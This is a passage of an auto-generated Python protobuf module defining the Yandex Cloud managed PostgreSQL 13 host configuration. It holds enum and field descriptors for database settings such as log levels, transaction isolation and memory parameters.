\x01(\x0e\x32O.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ForceParallelMode\x12\x63\n\x13\x63lient_min_messages\x18\x0e \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel\x12`\n\x10log_min_messages\x18\x0f \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel\x12g\n\x17log_min_error_statement\x18\x10 \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel\x12?\n\x1alog_min_duration_statement\x18\x11 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0flog_checkpoints\x18\x12 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0flog_connections\x18\x13 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x36\n\x12log_disconnections\x18\x14 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x30\n\x0clog_duration\x18\x15 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12l\n\x13log_error_verbosity\x18\x16 \x01(\x0e\x32O.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogErrorVerbosity\x12\x32\n\x0elog_lock_waits\x18\x17 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x61\n\rlog_statement\x18\x18 \x01(\x0e\x32J.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogStatement\x12\x33\n\x0elog_temp_files\x18\x19 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x13\n\x0bsearch_path\x18\x1a \x01(\t\x12\x30\n\x0crow_security\x18\x1b \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12y\n\x1d\x64\x65\x66\x61ult_transaction_isolation\x18\x1c \x01(\x0e\x32R.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.TransactionIsolation\x12\x36\n\x11statement_timeout\x18\x1d \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0clock_timeout\x18\x1e \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12H\n#idle_in_transaction_session_timeout\x18\x1f \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12_\n\x0c\x62ytea_output\x18 \x01(\x0e\x32I.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ByteaOutput\x12Z\n\txmlbinary\x18! \x01(\x0e\x32G.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlBinary\x12Z\n\txmloption\x18\" \x01(\x0e\x32G.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlOption\x12;\n\x16gin_pending_list_limit\x18# \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x35\n\x10\x64\x65\x61\x64lock_timeout\x18$ \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19max_locks_per_transaction\x18% \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x43\n\x1emax_pred_locks_per_transaction\x18& \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\x0b\x61rray_nulls\x18\' \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x65\n\x0f\x62\x61\x63kslash_quote\x18( \x01(\x0e\x32L.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.BackslashQuote\x12\x35\n\x11\x64\x65\x66\x61ult_with_oids\x18) \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15\x65scape_string_warning\x18* \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14lo_compat_privileges\x18+ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x1boperator_precedence_warning\x18, \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15quote_all_identifiers\x18- \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x1bstandard_conforming_strings\x18. \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14synchronize_seqscans\x18/ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15transform_null_equals\x18\x30 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x31\n\rexit_on_error\x18\x31 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\rseq_page_cost\x18\x32 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x36\n\x10random_page_cost\x18\x33 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x35\n\x11\x65nable_bitmapscan\x18\x36 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_hashagg\x18\x37 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_hashjoin\x18\x38 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_indexscan\x18\x39 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14\x65nable_indexonlyscan\x18: \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_material\x18; \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_mergejoin\x18< \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_nestloop\x18= \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_seqscan\x18> \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12/\n\x0b\x65nable_sort\x18? \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_tidscan\x18@ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x45\n\x14max_parallel_workers\x18\x41 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12P\n\x1fmax_parallel_workers_per_gather\x18\x42 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12\x10\n\x08timezone\x18\x43 \x01(\t\x12I\n\x18\x65\x66\x66\x65\x63tive_io_concurrency\x18\x44 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1000\x12M\n\x14\x65\x66\x66\x65\x63tive_cache_size\x18\x45 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x30-549755813888\"\x9a\x01\n\x13\x43onstraintExclusion\x12$\n CONSTRAINT_EXCLUSION_UNSPECIFIED\x10\x00\x12\x1b\n\x17\x43ONSTRAINT_EXCLUSION_ON\x10\x01\x12\x1c\n\x18\x43ONSTRAINT_EXCLUSION_OFF\x10\x02\x12\"\n\x1e\x43ONSTRAINT_EXCLUSION_PARTITION\x10\x03\"\x92\x01\n\x11\x46orceParallelMode\x12#\n\x1f\x46ORCE_PARALLEL_MODE_UNSPECIFIED\x10\x00\x12\x1a\n\x16\x46ORCE_PARALLEL_MODE_ON\x10\x01\x12\x1b\n\x17\x46ORCE_PARALLEL_MODE_OFF\x10\x02\x12\x1f\n\x1b\x46ORCE_PARALLEL_MODE_REGRESS\x10\x03\"\x92\x02\n\x08LogLevel\x12\x19\n\x15LOG_LEVEL_UNSPECIFIED\x10\x00\x12\x14\n\x10LOG_LEVEL_DEBUG5\x10\x01\x12\x14\n\x10LOG_LEVEL_DEBUG4\x10\x02\x12\x14\n\x10LOG_LEVEL_DEBUG3\x10\x03\x12\x14\n\x10LOG_LEVEL_DEBUG2\x10\x04\x12\x14\n\x10LOG_LEVEL_DEBUG1\x10\x05\x12\x11\n\rLOG_LEVEL_LOG\x10\x06\x12\x14\n\x10LOG_LEVEL_NOTICE\x10\x07\x12\x15\n\x11LOG_LEVEL_WARNING\x10\x08\x12\x13\n\x0fLOG_LEVEL_ERROR\x10\t\x12\x13\n\x0fLOG_LEVEL_FATAL\x10\n\x12\x13\n\x0fLOG_LEVEL_PANIC\x10\x0b\"\x99\x01\n\x11LogErrorVerbosity\x12#\n\x1fLOG_ERROR_VERBOSITY_UNSPECIFIED\x10\x00\x12\x1d\n\x19LOG_ERROR_VERBOSITY_TERSE\x10\x01\x12\x1f\n\x1bLOG_ERROR_VERBOSITY_DEFAULT\x10\x02\x12\x1f\n\x1bLOG_ERROR_VERBOSITY_VERBOSE\x10\x03\"\x8a\x01\n\x0cLogStatement\x12\x1d\n\x19LOG_STATEMENT_UNSPECIFIED\x10\x00\x12\x16\n\x12LOG_STATEMENT_NONE\x10\x01\x12\x15\n\x11LOG_STATEMENT_DDL\x10\x02\x12\x15\n\x11LOG_STATEMENT_MOD\x10\x03\x12\x15\n\x11LOG_STATEMENT_ALL\x10\x04\"\xe6\x01\n\x14TransactionIsolation\x12%\n!TRANSACTION_ISOLATION_UNSPECIFIED\x10\x00\x12*\n&TRANSACTION_ISOLATION_READ_UNCOMMITTED\x10\x01\x12(\n$TRANSACTION_ISOLATION_READ_COMMITTED\x10\x02\x12)\n%TRANSACTION_ISOLATION_REPEATABLE_READ\x10\x03\x12&\n\"TRANSACTION_ISOLATION_SERIALIZABLE\x10\x04\"[\n\x0b\x42yteaOutput\x12\x1c\n\x18\x42YTEA_OUTPUT_UNSPECIFIED\x10\x00\x12\x14\n\x10\x42YTEA_OUTPUT_HEX\x10\x01\x12\x18\n\x14\x42YTEA_OUTPUT_ESCAPED\x10\x02\"R\n\tXmlBinary\x12\x1a\n\x16XML_BINARY_UNSPECIFIED\x10\x00\x12\x15\n\x11XML_BINARY_BASE64\x10\x01\x12\x12\n\x0eXML_BINARY_HEX\x10\x02\"X\n\tXmlOption\x12\x1a\n\x16XML_OPTION_UNSPECIFIED\x10\x00\x12\x17\n\x13XML_OPTION_DOCUMENT\x10\x01\x12\x16\n\x12XML_OPTION_CONTENT\x10\x02\"\x9a\x01\n\x0e\x42\x61\x63kslashQuote\x12\x1f\n\x1b\x42\x41\x43KSLASH_QUOTE_UNSPECIFIED\x10\x00\x12\x13\n\x0f\x42\x41\x43KSLASH_QUOTE\x10\x01\x12\x16\n\x12\x42\x41\x43KSLASH_QUOTE_ON\x10\x02\x12\x17\n\x13\x42\x41\x43KSLASH_QUOTE_OFF\x10\x03\x12!\n\x1d\x42\x41\x43KSLASH_QUOTE_SAFE_ENCODING\x10\x04\x42\x81\x01\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresqlb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,yandex_dot_cloud_dot_validation__pb2.DESCRIPTOR,])
_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION = _descriptor.EnumDescriptor(
name='ConstraintExclusion',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ConstraintExclusion',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_ON', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_OFF', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_PARTITION', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4599,
serialized_end=4753,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION)
_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE = _descriptor.EnumDescriptor(
name='ForceParallelMode',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ForceParallelMode',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_ON', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_OFF', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_REGRESS', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4756,
serialized_end=4902,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE)
_POSTGRESQLHOSTCONFIG13_LOGLEVEL = _descriptor.EnumDescriptor(
name='LogLevel',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG5', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG4', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG3', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG2', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG1', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_LOG', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_NOTICE', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_WARNING', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_ERROR', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_FATAL', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_PANIC', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4905,
serialized_end=5179,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_LOGLEVEL)
_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY = _descriptor.EnumDescriptor(
name='LogErrorVerbosity',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogErrorVerbosity',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_TERSE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_DEFAULT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_VERBOSE', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5182,
serialized_end=5335,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY)
_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT = _descriptor.EnumDescriptor(
name='LogStatement',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogStatement',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_NONE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_DDL', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_MOD', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_ALL', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5338,
serialized_end=5476,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT)
_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION = _descriptor.EnumDescriptor(
name='TransactionIsolation',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.TransactionIsolation',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_READ_UNCOMMITTED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_READ_COMMITTED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_REPEATABLE_READ', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_SERIALIZABLE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5479,
serialized_end=5709,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION)
_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT = _descriptor.EnumDescriptor(
name='ByteaOutput',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ByteaOutput',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_HEX', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_ESCAPED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5711,
serialized_end=5802,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT)
_POSTGRESQLHOSTCONFIG13_XMLBINARY = _descriptor.EnumDescriptor(
name='XmlBinary',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlBinary',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='XML_BINARY_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_BINARY_BASE64', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_BINARY_HEX', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5804,
serialized_end=5886,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_XMLBINARY)
_POSTGRESQLHOSTCONFIG13_XMLOPTION = _descriptor.EnumDescriptor(
name='XmlOption',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlOption',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='XML_OPTION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_OPTION_DOCUMENT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_OPTION_CONTENT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5888,
serialized_end=5976,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_XMLOPTION)
_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE = _descriptor.EnumDescriptor(
name='BackslashQuote',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.BackslashQuote',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_ON', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_OFF', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_SAFE_ENCODING', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5979,
serialized_end=6133,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE)
_POSTGRESQLHOSTCONFIG13 = _descriptor.Descriptor(
name='PostgresqlHostConfig13',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='recovery_min_apply_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.recovery_min_apply_delay', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='shared_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.shared_buffers', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.temp_buffers', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.work_mem', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_file_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.temp_file_limit', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backend_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.backend_flush_after', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='old_snapshot_threshold', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.old_snapshot_threshold', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\010-1-86400', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_standby_streaming_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_standby_streaming_delay', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='constraint_exclusion', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.constraint_exclusion', index=8,
number=9, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cursor_tuple_fraction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.cursor_tuple_fraction', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.from_collapse_limit', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='join_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.join_collapse_limit', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='force_parallel_mode', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.force_parallel_mode', index=12,
number=13, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='client_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.client_min_messages', index=13,
number=14, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_min_messages', index=14,
number=15, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_error_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_min_error_statement', index=15,
number=16, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
